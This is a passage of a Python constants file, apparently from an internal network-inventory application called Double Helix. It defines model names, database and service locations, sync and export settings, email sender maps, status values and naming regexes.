'LSOptics'\nMODEL_MANUFACTURER = 'Manufacturer'\nMODEL_METRO = 'Metro'\nMODEL_METROCONTENTS = 'MetroContents'\nMODEL_MOGLOG_RACK = 'MoglogRack'\nMODEL_NAMESEQUENCE = 'NameSequence'\nMODEL_NETWORKELEMENT = 'NetworkElement'\nMODEL_NETWORK_CONNECTION = 'NetworkConnection'\nMODEL_OMS = 'OMS'\nMODEL_ON_NETWORK_INVENTORY_MAPPING = 'OnNetworkInventoryMapping'\nMODEL_ORDER = 'Order'\nMODEL_ORDER_ITEM = 'OrderItem'\nMODEL_OSPCABLE_SEGMENT = 'OspCableSegment'\nMODEL_OSPCONTAINER = 'OspContainer'\nMODEL_OSP_LIGHT_PATH_FIBERS = 'OspLightPathFibers'\nMODEL_OVERHEAD_CABLE = 'OverheadCable'\nMODEL_PANEL_XCON = 'PanelXcon'\nMODEL_PART = 'Part'\nMODEL_PATH_ELEMENT = 'PathElement'\nMODEL_PHYSICAL_SPOF = 'PhysicalSPOF'\nMODEL_POP = 'Pop'\nMODEL_POPCONTENTS = 'PopContents'\nMODEL_PORT = 'Port'\nMODEL_CONNECTOR = 'Connector'\nMODEL_CONNECTOR_TYPE = 'ConnectorType'\nMODEL_PERMISSION = 'Permission'\nMODEL_PORT_INTERFACE_TYPE = 'PortInterfaceType'\nMODEL_PORT_RESERVATION = 'PortReservation'\nMODEL_PORT_STATUS_SUMMARY = 'PortStatusSummary'\nMODEL_RACK = 'Rack'\nMODEL_RACK_SPACE_POWER = 'RackSpacePower'\nMODEL_RACKROW = 'RackRow'\nMODEL_RACK_ROLE_TYPE = 'RackRoleType'\nMODEL_RACK_ROLE_SUB_TYPE = 'RackRoleSubType'\nMODEL_ROLE_PAIR = 'RolePair'\nMODEL_SETTING = 'Setting'\nMODEL_SLOT = 'Slot'\nMODEL_SOCKET = 'Socket'\nMODEL_SPACE = 'Space'\nMODEL_SPACE_CONTENT = 'SpaceContent'\nMODEL_SPECTRUM_DESIGN = 'SpectrumDesign'\nMODEL_SPECTRUM_UTILIZATION = 'SpectrumUtilization'\nMODEL_STRAND = 'Strand'\nMODEL_SPLICE = 'Splice'\nMODEL_ALL = 'ALL'\nMODEL_SUBBUILDING = 'SubBuilding'\nMODEL_SUB_CIRCUIT = 'SubCircuit'\nMODEL_SUBMARINE_OMS_OTS = 'SubmarineOMSToOTS'\nMODEL_SUBTOPOLOGY = 'SubTopology'\nMODEL_THIRDPARTY_TRANSPORT = 'ThirdPartyTransport'\nMODEL_TRAFFIC_WEEK_REPORT = 'TrafficWeekReport'\nMODEL_TRANSPORT_PORTMAP = 'TransportPortmap'\nMODEL_VENDOR = 'Vendor'\nMODEL_VIRTUAL_INTERFACE = 'VirtualInterface'\nMODEL_VIRTUAL_INTERFACE_PORTS = 'VirtualInterfacePorts'\n# Meta models used in device 
logic.\nMODEL_EXISTING = 'Existing'\nMODEL_TEMPLATE = 'Template'\n\n# Model names used only by UNM export and ACT Pipeline.\nMODEL_UNM_CHASSIS = 'Chassis'\nMODEL_UNM_DEVICE_CONNECTIVITY = 'DeviceConnectivity'\nMODEL_UNM_PATCH_PANEL = 'PatchPanel'\nMODEL_UNM_PARENT_RACK = 'ParentRack'\nMODEL_UNM_SERVICE_PROVIDER_DEPRECATED = 'ServiceProvider'\n\nUNKNOWN_NUMBER = 999\n\n# The regular expression for the Google Netops Rack.\nREGEX_NETOPS_RACK = r'[A-Z]{3}\d{2}-\d{1,2}-\d{1,2}'\n\n# The constant to represent a Google Netops Rack.\nGOOGLE_NETOPS_RACK = 'Google Netops Rack'\n\n# The constant to represent a Vendor Rack.\nVENDOR_RACK = 'Vendor Rack'\n\n# The constant to represent a Number only Rack.\nDC_RACK = 'DC Rack'\n\nOTHER_RACK = 'Other Rack'\n\n# The constant to represent a prefix for Vendor Rack.\nVRR_PREFIX = 'VRR-'\n\n# Default number of pins to assume for MPO port tracing.\nDEFAULT_MPO_PIN_COUNT = 12\n\n# The setting entity key name for height_ru tolerance.\nHEIGHT_RU_TOLERANCE = 'HEIGHT_RU_TOLERANCE'\n\n# The setting entity for import status list view.\nIMPORT_STATUS_LIST_PERM = 'GROUPS_ALLOWED_ANY_IMPORT_STATUS'\n\n# The setting entity for allowing validation override for csv import.\nALLOWED_IMPORT_OVERRIDE = 'GROUPS_ALLOWED_IMPORT_OVERRIDE'\n\n# The setting entity for allowing creating new tables via csv import.\nCSV_CREATE_GROUPS = 'CSV_CREATE_GROUPS'\n\n# START NetcrackerSync constants.\n# The NetCracker object id of the entity.\nOBJECT_ID = 'OBJECT_ID'\n\n# The allowed NetCracker update operations.\nACCEPTED_NC_ACTIONS = ('insert', 'update', 'delete')\n\n# Settings.\n# The setting entity key name for Grenade dev stubby server.\nGRENADE_DEV_HOST_URL = 'GRENADE_DEV_STUBBY_URL'\n\n# The setting entity key name for Grenade staging stubby server.\nGRENADE_STAGING_HOST_URL = 'GRENADE_STAGING_STUBBY_URL'\n\n# The setting entity key name for Grenade test stubby server.\nGRENADE_TEST_HOST_URL = 'GRENADE_TEST_STUBBY_URL'\n\n# The setting entity key name for Grenade prod stubby server.\nGRENADE_PROD_HOST_URL = 'GRENADE_PROD_STUBBY_URL'\n\n# The setting entity key name for Grenade prodbackup stubby server.\nGRENADE_PRODBACKUP_HOST_URL = 'GRENADE_PRODBACKUP_STUBBY_URL'\n\n# The setting entity key name for Grenade act stubby server.\nGRENADE_ACT_HOST_URL = 'GRENADE_ACT_STUBBY_URL'\n\n# The default Grenade stubby url.\nDEFAULT_GRENADE_HOST_URL = ('blade:netops-bazooka-grenade-dev')\n\n# Netcracker sync operations.\nNET_CRACKER_DELETE = 'Delete'\nNET_CRACKER_INSERT = 'Insert'\nNET_CRACKER_UPDATE = 'Update'\n\n# Netcracker Sync queue stats 'Setting' constants.\nNCSYNC_QUEUE_THRESHOLD = 'NCSYNC_QUEUE_THRESHOLD'\nNCSYNC_QUEUE_DEFAULT_THRESHOLD = 1000\n\nNCSYNC_QUEUE_NOTIFICATION_TO = 'NCSYNC_QUEUE_NOTIFICATION_TO'\nNCSYNC_QUEUE_NOTIFICATION_DEFAULT_TO = 'dhops@google.com'\n# END NetcrackerSync constants.\n\n# START Bazooka constants.\n# Settings for Import related flag names.\n# Flag to enable the revision history on the Bazooka imported models.\nBZ_REVISIONS = 'BZ_REVISIONS'\n\n# Flag to switch on/off Moglog only entities on Bazooka import.\nBZ_MOGLOG_ENTITIES = 'BZ_MOGLOG_ENTITIES'\n\n# Flag to switch on/off to import only the device contents.\nBZ_IMPORT_ONLY_CONTENTS = 'BZ_IMPORT_ONLY_DEVICE_CONTENTS'\n\n# Flag to switch on/off Moglog only entities on Bazooka import.\nBZ_DISABLE_MOGLOG_ENTITIES = 'BZ_DISABLE_MOGLOG_ENTITIES'\n\n# Bazooka DB's\nBAZOOKA_DEV = '/cloudsql/google.com:nc-bazooka:bazooka-dev'\nBAZOOKA_PROD_AUTO = 
'/cloudsql/google.com:nc-bazooka:bazooka-prod-auto'\nBAZOOKA_PROD_AUTO_PRODBACKUP_REPLICA = (\n '/cloudsql/google.com:nc-bazooka:bazooka-prod-auto-prodbackup-replica'\n)\nBAZOOKA_PROD_AUTO_STAGING_REPLICA = (\n '/cloudsql/google.com:nc-bazooka:bazooka-prod-auto-staging-replica'\n)\n\n# Bazooka Speckle instances map.\nSPECKLE_DB = 'bazooka'\n\n# bazookasync user.\nBZ_SYNC = 'bazookasync'\nBZ_SYNC_DELTA_HOURS = 'BZ_SYNC_DELTA_HOURS'\nBZ_SYNC_DELTA_MINUTES = 'BZ_SYNC_DELTA_MINUTES'\n\n# Bazooka tables.\nBZ_CONDUIT_CAPACITY = 'BZ_CONDUIT_CAPACITY'\nBZ_CONNECTOR = 'BZ_CONNECTOR'\nBZ_DEVICE = 'BZ_DEVICE'\nBZ_EDGE_SPLICE = 'BZ_EDGE_SPLICE'\nBZ_ISP_WIRE = 'BZ_ISP_WIRE'\nBZ_LEASED_WAVE_TO_ROUTE = 'BZ_LEASED_WAVE_TO_ROUTE'\nBZ_OSP_CABLE = 'BZ_OSP_CABLE'\nBZ_OSP_FIBER = 'BZ_OSP_FIBER'\nBZ_PANEL_XCON = 'BZ_PANEL_XCON'\nBZ_PORT = 'BZ_PORT'\nBZ_SPLICE = 'BZ_SPLICE'\nBZ_VIRTUAL_INTERFACE_PORTS = 'BZ_VIRTUAL_INTERFACE_PORTS'\n\n# Bazooka columns.\nBZ_NAME = 'NAME'\nBZ_GUNS = 'GUNS'\nBZ_KEY_NAME = 'KEY_NAME'\nBZ_CREATED_BY = 'CREATED_BY'\n\n# END Bazooka constants.\n\n# Common constants.\nCOLON_DELIMITER = ':'\n\n# Common controllers.\nDEP_ERRORS = 'dependency'\nCALL_ERRORS = 'call_errors'\nID = 'id'\n\n# Unknown value constant, for setting values that aren't known instead of using\n# None. Displaying an unknown value is more user-friendly.\nUNKNOWN_VALUE = 'UNKNOWN'\n\n# History constants.\nDEFAULT_HISTORY_LIMIT = 500\n\n# Google Analytics Property ID constants.\nGA_PROPERTY_ID_DEFAULT = 'UA-47042903-3'\n\n# These are the status state values used for display purposes. For status\n# involving equality checks, used the constants below.\nASBUILT_DISPLAY_STATUS = 'AsBuilt'\nINSERVICE_DISPLAY_STATUS = 'InService'\nPLANNED_DISPLAY_STATUS = 'Planned'\nDECOM_DISPLAY_STATUS = 'Decommissioned'\nFORKLIFT_DISPLAY_STATUS = 'Forklift'\n\n# These are the global physical status value list used for status calculations.\nPLANNED_STATUS = ('planned', 'btp')\nASBUILT_STATUS = ('asbuilt',)\nDECOMMISSIONED_STATUS = ('decommissioned',)\n\n# Physical status field constants.\nPHYSICAL_STATUS = 'physical_status'\nPHYSICAL_USAGE_STATUS = 'physical_usage_status' # Representation in Port.\nPHYSICAL_STATUS_ASBUILT = 'asbuilt'\nPHYSICAL_STATUS_DECOMMISSIONED = 'decommissioned'\nPHYSICAL_STATUS_PLANNED = 'planned'\n\n# Logical status.\nLOGICAL_STATUS = 'logical_status'\nLOGICAL_USAGE_STATUS = 'logical_usage_status' # Representation in Port.\nLOGICAL_STATUS_ASBUILT = 'AsBuilt'\nLOGICAL_STATUS_DECOMMISSIONED = 'Decommissioned'\n\n\nMANAGEMENT_STATUS = 'management_status'\nBROKEN_STATUS = 'broken'\n\n# Bazooka report sender email address.\nEMAIL_REPORT_SENDER_MAP = collections.defaultdict(\n lambda: None, # Default factory.\n **{\n APP_IDENTITY_DEV: 'reports@netdesign-dev.appspotmail.com',\n APP_IDENTITY_DEMO: 'reports@netdesign-demo.appspotmail.com',\n APP_IDENTITY_PROD: 'reports@netdesign-prod.appspotmail.com',\n APP_IDENTITY_TEST: 'reports@netdesign-test.appspotmail.com',\n APP_IDENTITY_STAGING: 'reports@netdesign-staging.appspotmail.com',\n APP_IDENTITY_PRODBACKUP: 'reports@netdesign-prodbackup.appspotmail.com',\n APP_IDENTITY_ACT: 'reports@netdesign-act.appspotmail.com',\n APP_IDENTITY_ANTBOM: 'reports@netdesign-antbom.appspotmail.com',\n APP_IDENTITY_ACT2: 'reports@netdesign-act2.appspotmail.com',\n })\n\n# Email template sender email address.\nEMAIL_TEMPLATE_SENDER_MAP = collections.defaultdict(\n lambda: 'doublehelix-noreply+unknown@google.com', # Default factory.\n **{\n APP_IDENTITY_DEMO: 'doublehelix-noreply+demo@google.com',\n 
APP_IDENTITY_DEV: 'doublehelix-noreply+dev@google.com',\n APP_IDENTITY_PROD: 'doublehelix-noreply+prod@google.com',\n APP_IDENTITY_TEST: 'doublehelix-noreply+test@google.com',\n APP_IDENTITY_STAGING: 'doublehelix-noreply+staging@google.com',\n APP_IDENTITY_PRODBACKUP: 'doublehelix-noreply+prodbackup@google.com',\n APP_IDENTITY_ACT: 'doublehelix-noreply+act@google.com',\n APP_IDENTITY_ACT2: 'doublehelix-noreply+act2@google.com',\n APP_IDENTITY_ANT: 'doublehelix-noreply+ant@google.com',\n APP_IDENTITY_ANTBOM: 'doublehelix-noreply+antbom@google.com',\n })\n\n# Flag for DH training entities.\nTRAINING_DATA_FLAG = 'training'\n\n# Size constants.\nMM_TO_IN_CONSTANT = 0.0393701\nCM_TO_IN_CONSTANT = 0.393701\nIN_TO_MM_CONSTANT = 25.4\nIN_TO_CM_CONSTANT = 2.54\nHEIGHT_RU_CONSTANT = 1.75\n# Used to convert floating point ru values to whole number.\nRU_FACTOR = 100\n\n# Default list method limit.\nLIST_DEFAULT_LIMIT = 250\n\n# Maximum number of results to display in list methods.\nLIST_MAX_LIMIT = 5000\n\n# Maximum ndb.StringProperty size.\nMAX_NDB_STRING_BYTES = 1500\n\n# Borg service location constants.\nCMDATA_ACT = '/abns/netdesign/cmdata_act.server'\nCMDATA_ACT2 = '/abns/netdesign/cmdata_act2.server'\nCMDATA_DEV = '/abns/netdesign/cmdata_dev.server'\nCMDATA_DEMO = '/abns/netdesign/cmdata_demo.server'\nCMDATA_PROD = '/abns/netdesign/cmdata.server'\nCMDATA_PRODBACKUP = '/abns/netdesign/cmdata_prodbackup.server'\nCMDATA_STAGING = '/abns/netdesign/cmdata_staging.server'\nCMDATA_ANTBOM = '/abns/netdesign/cmdata_antbom.server'\n\nHARDWARE_PROD = '/abns/netdesign/hardware.server'\nHARDWARE_DEMO = '/abns/netdesign/hardware_demo.server'\nHARDWARE_DEV = '/abns/netdesign/hardware_dev.server'\nHARDWARE_STAGING = '/abns/netdesign/hardware_staging.server'\nHARDWARE_PRODBACKUP = '/abns/netdesign/hardware_prodbackup.server'\nHARDWARE_ACT = '/abns/netdesign/hardware_act.server'\nHARDWARE_ACT2 = '/abns/netdesign/hardware_act2.server'\nHARDWARE_ANTBOM = '/abns/netdesign/hardware_antbom.server'\n\nROBO_PROD = '/abns/netdesign/robo_api.server'\nROBO_DEV = '/abns/netdesign/robo_api_dev.server'\nROBO_STAGING = '/abns/netdesign/robo_api_staging.server'\nROBO_PRODBACKUP = '/abns/netdesign/robo_api_prodbackup.server'\n\n# pylint: disable=line-too-long\nPORTS_RESERVE_DEV = '/bns/pa/borg/pa/bns/netdesign/doublehelix_dev_service/0'\nPORTS_RESERVE_TEST = '/bns/pa/borg/pa/bns/netdesign/doublehelix_test_service/0'\nPORTS_RESERVE_STAGING = 'blade:doublehelix_staging_service'\nPORTS_RESERVE_PRODBACKUP = 'blade:doublehelix_prodbackup_service'\nPORTS_RESERVE_ACT = 'blade:doublehelix_act_service'\nPORTS_RESERVE_ACT2 = 'blade:doublehelix_act2_service'\nPORTS_RESERVE_PROD = 'blade:doublehelix_prod_service'\nPORTS_RESERVE_ANTBOM = 'blade:doublehelix_antbom_service'\n# pylint: enable=line-too-long\n\n\n# START NEST sync constants.\nNEST_PROD = 'blade:netsoft-nest-server'\nNEST_SERVICE_LOCATION = NEST_PROD\nNEST_SYNC_USER = 'nestsync'\n# END NEST sync constants.\n\n\n# TODO(kyatham): Figure out a better way to handle these scenarios.\nCMDATA_SERVICE_LOCATION_MAP = collections.defaultdict(\n lambda: CMDATA_DEMO, # Default factory.\n **{APP_IDENTITY_PROD: CMDATA_PROD,\n APP_IDENTITY_DEMO: CMDATA_DEMO,\n APP_IDENTITY_DEV: CMDATA_DEV,\n APP_IDENTITY_STAGING: CMDATA_STAGING,\n APP_IDENTITY_ACT: CMDATA_ACT,\n APP_IDENTITY_ACT2: CMDATA_ACT2,\n APP_IDENTITY_ANTBOM: CMDATA_ANTBOM,\n APP_IDENTITY_PRODBACKUP: CMDATA_PRODBACKUP})\n\nHARDWARE_SERVICE_LOCATION_MAP = collections.defaultdict(\n lambda: HARDWARE_DEMO, # Default factory.\n 
**{APP_IDENTITY_PROD: HARDWARE_PROD,\n APP_IDENTITY_DEMO: HARDWARE_DEMO,\n APP_IDENTITY_DEV: HARDWARE_DEV,\n APP_IDENTITY_STAGING: HARDWARE_STAGING,\n APP_IDENTITY_ACT: HARDWARE_ACT,\n APP_IDENTITY_ACT2: HARDWARE_ACT2,\n APP_IDENTITY_ANTBOM: HARDWARE_ANTBOM,\n APP_IDENTITY_PRODBACKUP: HARDWARE_PRODBACKUP})\n\nPORTS_RESERVATION_SERVICE_BLADE = collections.defaultdict(\n lambda: PORTS_RESERVE_TEST, # Default factory.\n **{\n APP_IDENTITY_DEV: PORTS_RESERVE_DEV,\n APP_IDENTITY_TEST: PORTS_RESERVE_TEST,\n APP_IDENTITY_STAGING: PORTS_RESERVE_STAGING,\n APP_IDENTITY_ACT: PORTS_RESERVE_ACT,\n APP_IDENTITY_ACT2: PORTS_RESERVE_ACT2,\n APP_IDENTITY_ANTBOM: PORTS_RESERVE_ANTBOM,\n APP_IDENTITY_PRODBACKUP: PORTS_RESERVE_PRODBACKUP,\n APP_IDENTITY_PROD: PORTS_RESERVE_PROD\n })\n\nROBO_SERVICE_LOCATION_MAP = collections.defaultdict(\n lambda: ROBO_DEV, # Default factory.\n **{APP_IDENTITY_PROD: ROBO_PROD,\n APP_IDENTITY_DEV: ROBO_DEV,\n APP_IDENTITY_STAGING: ROBO_STAGING,\n APP_IDENTITY_PRODBACKUP: ROBO_PRODBACKUP})\n\n# Shared error messages.\nFILTER_AND_Q_ERROR = 'Request cannot contain both q and filter param.'\n\n# Double Helix rews bucket in Big Store.\nREWS_BUCKET_MAP = collections.defaultdict(\n lambda: 'doublehelix-rews-test', # Default factory.\n **{\n APP_IDENTITY_PROD: 'doublehelix-rews-prod',\n APP_IDENTITY_DEV: 'doublehelix-rews-dev',\n APP_IDENTITY_DEMO: 'doublehelix-rews-demo',\n APP_IDENTITY_TEST: 'doublehelix-rews-test',\n APP_IDENTITY_STAGING: 'doublehelix-rews-staging',\n APP_IDENTITY_PRODBACKUP: 'doublehelix-rews-prodbackup',\n APP_IDENTITY_ACT: 'doublehelix-rews-act',\n APP_IDENTITY_ACT2: 'doublehelix-rews-act2',\n APP_IDENTITY_ANT: 'doublehelix-rews-ant',\n APP_IDENTITY_ANTBOM: 'doublehelix-rews-antbom',\n })\n\n# Toposphere blades.\nTOPOSPHERE_BLADE_MAP = collections.defaultdict(\n lambda: 'blade:toposphere-sandbox-client', # Default factory.\n **{\n APP_IDENTITY_PROD: 'blade:toposphere',\n })\n\nTOPO_BLDG_FILENAME = 'toposphere_buildings.json'\nTOPO_SUBBLDG_FILENAME = 'toposphere_sub_buildings.json'\n# Toposphere building topology model name.\nTOPOSPHERE_BUILDING_MODEL = '/unm/toposphere/corp/buildings'\n# Toposphere subbuilding topology model name.\nTOPOSPHERE_SUBBUILDING_MODEL = '/unm/toposphere/sos_export'\n\n# How long to cache toposphere responses.\nTOPO_MEMCACHE_TIMEOUT = 60 * 60 # 1 hour.\n\n# SpaceContents keys switch.\nMODEL_SPACECONTENTS = 'SpaceContents'\nMODEL_RACK_ROW = 'RackRow'\nINSERT_ACTION = 'INSERT'\nDELETE_ACTION = 'DELETE'\nTRUE = 'true'\n\n# The setting key to enable/disable UNM export. Value TRUE/FALSE.\nUNM_EXPORT_ENABLED = 'UNM_EXPORT_ENABLED'\n\n# If true, verbose error logging. Can generate *lots* of messages. If False or\n# omitted, no verbose logging.\nUNM_EXPORT_VERBOSE_LOGGING = 'UNM_EXPORT_VERBOSE_LOGGING'\n\n# If true, enable and report full export memory usage. If False or omitted,\n# disabled.\nUNM_EXPORT_ENABLE_FULL_EXPORT_MEMORY_MEASUREMENT = (\n 'UNM_EXPORT_ENABLE_FULL_EXPORT_MEMORY_MEASUREMENT')\n\n# The setting entity key name for the UNM export proxy server.\n# Each instance (prod, staging, demo, ...) 
can have a distinct value.\nUNM_EXPORT_PROXY_URL = 'UNM_EXPORT_PROXY_URL'\n\n# Set this to an int > 0 to override the default shard count for sharded full\n# export entities.\nUNM_EXPORT_SHARD_COUNT = 'UNM_EXPORT_SHARD_COUNT'\n\n# UNM export logging severity codes.\nUNM_LOG_INFO = 'INFO'\nUNM_LOG_WARNING = 'WARNING'\nUNM_LOG_ERROR = 'ERROR'\n\n# UNM export operation codes\nUNM_EXPORT_UPDATE = 'UPDATE'\nUNM_EXPORT_RENAME = 'RENAME'\nUNM_EXPORT_DELETE = 'DELETE'\nUNM_EXPORT_CLEAN_RELATIONSHIPS = 'CLEANREL'\n\n# UNM 'operation' fields for streamz\nUNM_OP_PIPELINE = 'Pipeline' # Success/failure for an entire pipeline.\n# kind field is type of pipeline, and for\n# full export root how it was initiated.\n# Remaining operations give success/warning/error by entity kind when doing\n# a specific operation. The 'kind' field is the entity kind.\nUNM_OP_CHANGE_UPDATE = 'ChangeUpdate' # Updates of the given entity kind\nUNM_OP_CHANGE_DELETE = 'ChangeDelete' # Deletes of the given entity kind\nUNM_OP_CHANGE_RENAME = 'ChangeRename' # Renames of the given entity kind\nUNM_OP_CHANGE_CLEAN_RELATIONSHIPS = 'ChangeClean' # Clean_relationships of the\n# given entity kind\nUNM_OP_FULL_EXPORT = 'FullExport' # Full exports of the given entity kind\n\n# UNM pipeline types. These are the 'kind' streamz field for\n# operation=UNM_OP_PIPELINE.\n# Full export root pipeline. Also gives who initiated the full export:\nUNM_EXPORT_MANUAL = 'FullExportManual' # From DH admin console\nUNM_EXPORT_AUTOMATIC = 'FullExportAuto' # From proxy server request\nUNM_EXPORT_BIG_UPDATE = 'FullExportBigUpdate' # From too-big update\n# Full export child pipelines:\nUNM_PIPE_METROS_POPS = 'Metros/Pops'\nUNM_PIPE_LOGICAL_DEVICES = 'LogicalDevices'\nUNM_PIPE_ALL_SPACES = 'Buildings/SubBuildings/Floors/Spaces'\nUNM_PIPE_RACKS = 'Racks'\nUNM_PIPE_CHASSIS = 'Chassis'\nUNM_PIPE_PATCH_PANELS = 'PatchPanels/Ports'\nUNM_PIPE_PATCH_PANELS_SHARD = 'PatchPanels/Ports_Shard'\nUNM_PIPE_CIRCUITS = 'Circuits'\nUNM_PIPE_DEVICE_CONNECTIVITY = 'DeviceConnectivity'\n# Update pipeline:\nUNM_PIPE_UPDATE = 'Update'\n\n# For operations UNM_OP_CHANGE_UPDATE, UNM_OP_CHANGE_DELETE,\n# UNM_OP_CHANGE_RENAME, UNM_OP_CHANGE_CLEAN_RELATIONSHIPS, and\n# UNM_OP_FULL_EXPORT, the 'kind' field is the entity type, currently one of:\n# MODEL_METRO, MODEL_POP, MODEL_LOGICAL_DEVICES, MODEL_VENDOR, MODEL_BUILDING,\n# MODEL_SUBBUILDING, MODEL_FLOOR, MODEL_SPACE, MODEL_RACK, MODEL_UNM_CHASSIS,\n# MODEL_UNM_PATCH_PANEL, MODEL_PORT, MODEL_PORT_RESERVATION, MODEL_CIRCUIT,\n# MODEL_ACT_PATH_TX, MODEL_UNM_DEVICE_CONNECTIVITY\n\n# The 'status' streamz field is one of\nUNM_STATUS_SUCCESS = 'Success' # Successful pipeline or entity.\nUNM_STATUS_FAILURE = 'Failure' # Only for operation UNM_OP_PIPELINE\n# Remaining two are for operations other than UNM_OP_PIPELINE:\nUNM_STATUS_WARNING = 'Warnings'\nUNM_STATUS_ERROR = 'Errors'\n# NOTE THAT SUCCESS, WARNING, AND ERROR ARE MUTUALLY DISTINCT. Each exported\n# entity will fall in one and only one status. 
Entities exported with status\n# UNM_STATUS_WARNING are exported; those with UNM_STATUS_ERROR are not.\n\n# Examples:\n# (operation, kind, status) =\n# (UNM_OP_PIPELINE, UNM_EXPORT_MANUAL, UNM_STATUS_SUCCESS)\n# gives the count of successful runs of the full export root pipeline when\n# manually initiated.\n#\n# (operation, kind, status) =\n# (UNM_OP_PIPELINE, UNM_PIPE_PATCH_PANELS_SHARD, UNM_STATUS_FAILURE)\n# gives the count of failed runs of shard pipelines for PatchPanels/Ports.\n#\n# (operation, kind, status) =\n# (UNM_OP_PIPELINE, UNM_PIPE_UPDATE, UNM_STATUS_SUCCESS)\n# gives the count of successful runs of the Update pipeline.\n#\n# (operation, kind, status) =\n# (UNM_OP_CHANGE_UPDATE, MODEL_POP, UNM_STATUS_ERROR)\n# gives the count of Pops which encountered errors during an update operation to\n# insert or change a Pop.\n#\n# (operation, kind, status) =\n# (UNM_OP_CHANGE_RENAME, MODEL_UNM_CHASSIS, UNM_STATUS_SUCCESS)\n# gives the count of UNM Chassis (DH devices which aren't patch panels) which\n# were successfully renamed.\n#\n# (operation, kind, status) =\n# (UNM_OP_FULL_EXPORT, MODEL_UNM_PATCH_PANEL, UNM_STATUS_WARNING)\n# gives the count of exported PatchPanels and their ports with warnings during a\n# full export.\n\n# Appengine User constants.\nUSER_CONTEXT_FIELDS = [\n 'AUTH_DOMAIN', 'USER_EMAIL', 'USER_ID', 'FEDERATED_IDENTITY',\n 'FEDERATED_PROVIDER'\n]\n\n# Authz constants.\nAUTH_METHOD_HEADER = 'HTTP_X_DH_OVERRIDE_AUTH_METHOD'\nAUTH_METHOD_COOKIE = 'cookie'\nAUTH_METHOD_COOKIE_FIRST = 'cookie-first'\nAUTH_METHOD_REST = 'rest'\n\n# Email Template for ribbon publish.\nRIBBON_PUBLISH_EMAIL_TEMPLATE = {\n 'name': 'publish_ribbon',\n 'description': 'Email template for ribbon publish.',\n 'to': [],\n 'cc': [],\n 'subject': 'Ribbon published by {{user}}',\n 'body': ''\n 'The ribbon has been modified and published by {{user}}.'\n '',\n}\n\nSEND_DEV_NOTIFICATIONS = 'SEND_DEV_NOTIFICATIONS'\nDH_DEV_NOTIFY_ADDRESS = 'DH_DEV_NOTIFY_ADDRESS'\n\n# Pluggable devices key to look for in application settings.\nPLUGGABLE_DEVICES = 'PLUGGABLE_DEVICES'\n\n# Regex for Metro name.\nMETRO_NAME_RE_STRING = r'(\\d{4}-\\d{2}-\\d{2})?[A-Z]{3}'\nMETRO_NAME_RE = re.compile(r'^%s$' % METRO_NAME_RE_STRING)\n\n# Regex for Pop name.\nPOP_NAME_RE_STRING = METRO_NAME_RE_STRING + r'(?:0[1-9]|[1-9][0-9]|[1-9]\\d{2})'\nPOP_NAME_RE = re.compile(r'^%s$' % POP_NAME_RE_STRING)\n\n# Regex for Vendor name.\nVENDOR_CODE_RE = re.compile(r'^[A-Z0-9]{5}$')\n\n# Regex for name of patch panels.\n# The regexes produce these capturing groups:\n# 1) The name of the panel.\n# 2) The sequence number of the panel.\n# Optionally\n# 3) For corp panels the rews-id of the building.\n\n# Corp Panel naming rules are relaxed to allow a '-' or a '.' delimiter.\n# This allows existing malformed panel names using a '.' delimiter to be\n# considered when naming new panels so that sequence numbers are not re-used.\n# Corp panel name example: pp34-us-svl-mp5\n# Corp panel with malformed name: pp16-svl-mp5 (note no us-); i.e. the\n# panel creation predates the rename of the building rews-id to add the us-\n# prefix.\n# Corp panel with '.' 
in the name: pp16.us-svl-mp5 (note '.').\n# Collecting groups: name, sequence, rews-id.\nCORP_PANEL_NAME_RE = re.compile(\n r'^((?:PP|pp)([0-9]{1,3})(?:-|\\.)((?:\\w{2}-)*\\w{3}-[\\w-]+))')\n\n# Hwops non ngf name examples: spp40, pp41.\n# Groups: name, sequence.\nHWOPS_NON_NGF_PANEL_NAME_RE = re.compile(r'([csg]?pp(\\d+))')\n\n# Disable netcracker sync.\nNC_SYNC = 'NC_SYNC'\nFALSE = 'false'\n\n# Release email notification address.\nRELEASE_NOTIFY_TO_ADDRESS = 'RELEASE_NOTIFY_TO_ADDRESS'\nRELEASE_NOTIFY_REPLY_ADDRESS = 'RELEASE_NOTIFY_REPLY_ADDRESS'\nDEFAULT_RELEASE_NOTIFY_TO_ADDRESS = 'double-helix-team@google.com'\nDEFAULT_RELEASE_NOTIFY_REPLY_ADDRESS = ('DoubleHelix Discuss '\n '')\nRELEASE_NOTE_ITEM_PREFIX = r'* '\nRELEASE_NOTE_RAPID_MAX_CLS = 'RELEASE_NOTE_RAPID_MAX_CLS'\nRELEASE_NOTE_RAPID_RPC_TIMEOUT = 'RELEASE_NOTE_RAPID_RPC_TIMEOUT'\nRELEASE_NOTE_RAPID_RELEASE_LIMIT = 'RELEASE_NOTE_RAPID_RELEASE_LIMIT'\nDH_BUG_LINK = r'http://go/double-helix-bug'\n\n# Email template name constants.\nEMAIL_TEMPLATE_BTP_SUMMARY_REPORT = 'BTP_SUMMARY_REPORT'\nEMAIL_TEMPLATE_VERIFY_PATHS_COUNT = 'VERIFY_PATHS_COUNT'\n\n# Email package constants.\nEMAIL_BUCKET_NAME = 'doublehelixemail'\nRIVER_MINE_EMAIL = ('rm_rpts_to_netops ')\n\n# Transport InfraCap.\nTOTAL_INFRA_CAP_QUERY = 'TotalInfraCap_'\n\n# Double Helix Tables for BigQuery.\nEXPORT_BQ_DATASET = 'EXPORT_BQ_DATASET'\nEXPORT_CSV_TARGETS = 'EXPORT_CSV_TARGETS'\nEXPORT_BQ_TARGETS = 'EXPORT_BQ_TARGETS'\nEXPORT_BQ_EXCLUDED_KINDS = 'EXPORT_BQ_EXCLUDED_KINDS'\n\n# PathElement L1 Transport Vendors.\nPE_VENDOR_ALU = 'alcatel-lucent'\nPE_VENDOR_BTI = 'bti'\nPE_VENDOR_CIE = 'ciena'\nPE_VENDOR_INF = 'infinera'\nPE_VENDOR_NSN = 'siemens'\nPE_VENDOR_SUP = 'supernova'\nPE_VENDOR_SIE = PE_VENDOR_NSN\nPE_L1_VENDORS = [PE_VENDOR_ALU, PE_VENDOR_BTI, PE_VENDOR_CIE, PE_VENDOR_INF,\n PE_VENDOR_SUP, PE_VENDOR_NSN]\n\n# Various representation of devices in Device.description/Part__name.\nDEVICE_VENDOR_ALU = 'alcatel[- ]*lucent|alu'\nDEVICE_VENDOR_JDSU = 'jdsu'\n\n# Manufacturer representation.\nMANUFACTURE_ALU = PE_VENDOR_ALU\nMANUFACTURE_BTI = PE_VENDOR_BTI\nMANUFACTURE_CIE = PE_VENDOR_CIE\nMANUFACTURE_INF = PE_VENDOR_INF\nMANUFACTURE_NSN = 